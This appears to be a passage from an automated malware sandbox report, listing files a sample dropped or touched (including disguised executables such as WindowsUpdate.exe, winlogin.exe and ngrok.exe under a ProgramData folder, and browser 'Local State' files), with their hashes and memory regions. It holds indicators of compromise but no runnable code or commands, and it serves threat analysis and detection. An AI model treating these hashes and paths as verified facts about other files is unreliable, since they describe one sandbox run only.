                                                                                                                                                                                                                            e5c7eca456a98ed69ef21c4e54db9378f43f09ed44ac86e4c5c095e663ca262c455bd13784e6a0b13581194b8f847ae46ed1db3bda11bfbc55f28bdd2e05f054

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            01d56d9445ea91afcd510a3dd38c3019

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            29c700c693f7a57e2626bc930430629d0bd76758

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            e3fd4c8a36ec545edf8aad247fd2e0f8cde172b214abac6acb8d9816010b6582

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            bf799db69d37baa1aa6826dbbd040a06e7d25ec60c193dc20eb9f392172ef5b8bdc0671e60049d3d4449ab1db55ffeb00d70c1554e52680dd33553230f727935

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            e887b9ed74f8b76d746d574767bb4da3

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            b22fdf10f82e6872e56419b818275ef3bdb44cbf

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            e5a1651740193456bcd6bd81cf9188818cf3b1a7e1ce035cce0e2fc1fb31d7b8

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            1d5e92f744dd4e0c8f862831fdd5942a6edf838e1e9a12521567e3e1eadafbea7bbf4578a18fff923adf53d24dc09b8eb459db76f66939a2f76a348909a805fc

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            944B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            d28a889fd956d5cb3accfbaf1143eb6f

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            157ba54b365341f8ff06707d996b3635da8446f7

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            944B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            0aa63dbb46d451e47a7a682c64af776d

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            3b0026f2dae8e9c491ccaa40133755779de35aaa

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            4d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            944B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            4165c906a376e655973cef247b5128f1

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            c6299b6ab8b2db841900de376e9c4d676d61131e

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            fb0b3c822d300abbb892e6f218d6b4b62b80bb26d9184d1f4c731600053a3fc4

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            15783f2d3687388339c06423bd18c17a5704cd367bf1a1d08e436088984c0b5c52dc88d3b8455495a8051ba9f977aae34b69453e5ee252d928e74dcdebd4a11a

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            944B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            e5663972c1caaba7088048911c758bf3

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            944B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            22310ad6749d8cc38284aa616efcd100

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            440ef4a0a53bfa7c83fe84326a1dff4326dcb515

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            7c1682b4a141437fa51349c4871a7372

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            5e43ae31720ccfe9aea4aaa8b74cb4cc269a41c6

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            a89c075ffaa34f3db1eb386de254a13831d69429f238ae63a6e45bbbe644b24f

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            2b1e124169cff3eb8e3f36122ed52ff84c947e0e5430292c82ec81eb8a94e4cecba8b9ad44d3539d404defecf7ea4da914ead08d381a41272890b36dd4e54fe9

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            2419d068e09423d5e7edec9bb8010870

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            efad4265f7a649a87389e47febd71e5d

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            6c298f00f14dd89c376d08d92672e491fa736682

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            adae8ad2fd2d158f1d47b81e03119f5060c35c087f6f163a6c4f68cce642c584

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            2bedfd67cc7e028bb6c144cb01d13d7b883e13bd8d78faa56e57b0315f15e0a92b6e9c832179e6b51f9a4a61273d3abf759ef0724cdf9de096136d42f119eb86

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            4287e2b9dbbea8ad7fa88a7bce40d374

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            16dede9437ed9297c028e4f09339cdbefb212384

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            0b5fa4e9de85ec2a620f5d141bb78140b5f93b3ed01b5574cb18318334f3eb3a

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            327c893a03b5b8b9508f9da3986aa68d6b9715f0882ecfac811964fb85b156486b914a87cbc7aef7d165f70bc8c105febd63c3aa954962b7f614afc70ba14428

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            3df110e480ee96b0eb33e2a49b6e9c38

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            ab63f7e1cae2e3c353480cf9649ed003f297f02c

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            6e681c03c4803b75a721a4439acf24c12b774dea7c652f6feffe57466e3d056c

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            37287132e7a1cf3ee34d12db777fe1c067f79bc82dda78a9bca31880fa1937a9230d309b7dd04a541c33c8523063c038ef943673bffd36d3e276cc157383fcee

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            2af2d4d06821e07065851b89a4b7cb90

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            d1c82b79de3067f456c731259aefca0e286be732

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            d762013dd097342548a1a4b5e8993979ae0f27f7d2dfd6b5f90f8e54a43f754b

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            bdb90127d1f50d8a8c1aee99ebe2cb4aa3066f32496df397330493a14d87aeecde36ae7e46119f3213a3d8f2937cdb762504a44ab271c6ad3a839fc7adcb3e4f

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            c58f622cf96ae48cdc59c8caa8cc545f

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            23906e924f804fa2a5a03ba348329e4caa984345

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            4681e62101ee7a214467ef82abaa8202e89027ee04f97f0e31c4e90372f1d585

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3863fc6c6b793533c4af10f47a49e3e2471ccadd7fab63d513f008fe27ce3bf214c6238c52e1536329879377820e8ccbfb8d49a646a4038188cb07fcff083d28

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            a541fe00c67ec9669fd8a471bee7f8cd

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            8cc4af3217642cae5036616d5f965e917c1c06b5

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            5197ab67aae25e76075f03a12efce29bcfc19c8d26e50d549df20e732741d297

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            b6235713102fdcc540b6504c0aa48e3fce5bd106fbc1f2d44e9a86f4be29c60b999dd1fd29fd0ae1ff1cc7bc4d82615cc1bbc09ef219d6b3eb00ddb8bfd00651

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            6f1c7fb577a8725569185cdb6fb9d042

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            af52b44ad56caa09b702fac41270fae71cfee6c8

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            4a1230625674736eae846ce7ab0d6504cc8b1af740f1d2104bdac2dc54e9ccf4

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            a99db7190f0f41462338e8098f63c450cb7a3308fe1f0cff44756e93010c8fa4989f3bb350ba7df79dcae79181639f510d83d58169703e943a3a28c43f29f59d

                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnat3rth.d3q.ps1

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            60B

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\Unconfirmed 139392.crdownload

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            6KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            c312692f58ac65e9428f8fca3031b50e

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            394cbf172b5c2fe780a0a1638733a9578919e089

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            f3eae94dfc97dd8439503fe0b9c058e682d044844b28fdc61cf60ad7a580a995

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            59f6f59ce83b714425d4b957be0e0da1e3661846d8979a220fd8157c82b43f35aefd89dc5b2b283631bdd44e4f28fd98ef298e8d5a6f406b5e3f774536a77155

                                                                                                                                                                                                                          • C:\Windows\Logs\DISM\dism.log

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            242KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            91a430fee6a63bf5eed97f969507f6b9

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            2c9967b04648a143f70becf1fdd113264041530f

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            4b95939394b2c52307678605fd1846fd976151fb783c8d27286387ec8b0405d9

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            1b55bc6667cf3bbb25e7013556c866ed141381257a80ca2b96a55ab2f1b7d6c128e792e66a6b954eb3cec8e3c430beb0f014e395824c987b5936fd75bda98ed5

                                                                                                                                                                                                                          • C:\programdata\Windata\WindowsUpdate.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            8ece86485bd8c3962920f10c7c8a9779

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            e3dc2ddc0d763289cb63a16a103f741a42259e25

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            f4d5c8d77f21b25cbe7937359092dc42a814d373809c1e18f0867ffb4a60dd9b

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            bc5fd0768c5a9b730980bc6da4712108c1c263f0af192e16eadbef8027541d2e863dea89cfc9f9dbd060e40eae2673d1055c2b825eadf49f255e7e6638d8352f

                                                                                                                                                                                                                          • C:\programdata\Windata\installer.bat

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            98fb04c727f945b3cd70b0f99ddbe963

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            7ad7460fdd6809b58e94f44b98ef13b10961cfe6

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            be1d29a5ca1615b5453535b34bf405f561dbbb970132432a8deb0ec7c07192e0

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            009478dddcc456d81501139003ba3710c47af5f044e01faa66bbc1a10614031563e40a1d9ff95fbdff41e318fada46af6f32b8a06cef301ef633b6806daa55ac

                                                                                                                                                                                                                          • C:\programdata\Windata\ngrok.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            23.8MB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            e2eadf60d8f25cae9b29decab461177b

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            cecc54143cc375af1b9aed0021643b179574e592

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            b196ee33855a41c9888420410f55c06b6650c0680210c29075bdf0c09054ce3fa46af10163332715af0dae7a3eb1cb6c5d80cb604ca67f4c32934b8f17361c1f

                                                                                                                                                                                                                          • C:\programdata\Windata\smhost.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            28KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            7a3a984b1daa21def72d27f1243f62e4

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            6ade06bcb4931fd233deefcdab2760a3f33cafbb

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            5b454fb1a0f3b763b2d61bc6f8f2755c043b764245946b071ef2c00261ff2d19

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            94a2d08dfbcab32151d2c7f6b922d271b4609df112dc63ce5960d718d062d17d1228e20d9dbadf1c9656ff42c6b662a9ee20abcd6aa97ec18810eba9f21d39fa

                                                                                                                                                                                                                          • C:\programdata\Windata\srlhost.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            288KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            186895da317a238c1a8d87b42a4bc55a

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            a05dd5adf4b497f46e07d157da4b24fa31e85313

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            c1094c91c931e9f9e07ddd0df90250c8ca9eb8e633a087361f5d9956c3009a07

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            be039071f9954de45caf8ef345d55699102d4f5b0db2cd372eb66a9fbafa41581a89e838de30177dc5988ee69601506845a5018d948434671bc0267e6cc69e58

                                                                                                                                                                                                                          • C:\programdata\Windata\winlogin.exe

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            9e497a3855c86b45e07ed23710683de1

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            c9baae1a87fef165e9942119fb19631a2cbda8d8

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            54b9b8048365c9705d5b39c638c7ce5599a93685b2a44020ede883185409bb9f

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            da79293ea0a508ea3db40d6041d4d3d414772e32962eaae627e4a750b21872bb50a930bd6c97da86c18cd060e6fd9c3b746e396141ba7b1e38ca8596c5ed84b6

                                                                                                                                                                                                                          • memory/380-763-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                          • memory/1004-764-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                          • memory/1444-512-0x0000000000E10000-0x0000000000E18000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            32KB

                                                                                                                                                                                                                          • memory/1580-463-0x0000020E71D50000-0x0000020E71D62000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            72KB

                                                                                                                                                                                                                          • memory/1580-464-0x0000020E71D20000-0x0000020E71D2A000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                          • memory/2092-304-0x000002CA797A0000-0x000002CA797C2000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                          • memory/2488-792-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                          • memory/2592-563-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                          • memory/3168-777-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                          • memory/3360-513-0x0000000000250000-0x0000000000258000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            32KB

                                                                                                                                                                                                                          • memory/3360-516-0x0000000004AE0000-0x0000000004B72000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            584KB

                                                                                                                                                                                                                          • memory/3384-1133-0x000002E7A3320000-0x000002E7A333A000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            104KB

                                                                                                                                                                                                                          • memory/3384-1132-0x000002E7A32F0000-0x000002E7A32FE000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            56KB

                                                                                                                                                                                                                          • memory/4068-515-0x0000000005180000-0x0000000005724000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                                          • memory/4068-562-0x0000000006190000-0x000000000619A000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                          • memory/4068-514-0x0000000000290000-0x00000000002DE000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            312KB

                                                                                                                                                                                                                          • memory/4068-556-0x0000000004DE0000-0x0000000004E46000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            408KB

                                                                                                                                                                                                                          • memory/4068-558-0x0000000005110000-0x0000000005122000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            72KB

                                                                                                                                                                                                                          • memory/4068-560-0x0000000005E10000-0x0000000005E4C000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            240KB

                                                                                                                                                                                                                          • memory/5432-768-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                          • memory/5752-788-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                          • memory/5932-794-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                          • memory/5976-799-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                            1.4MB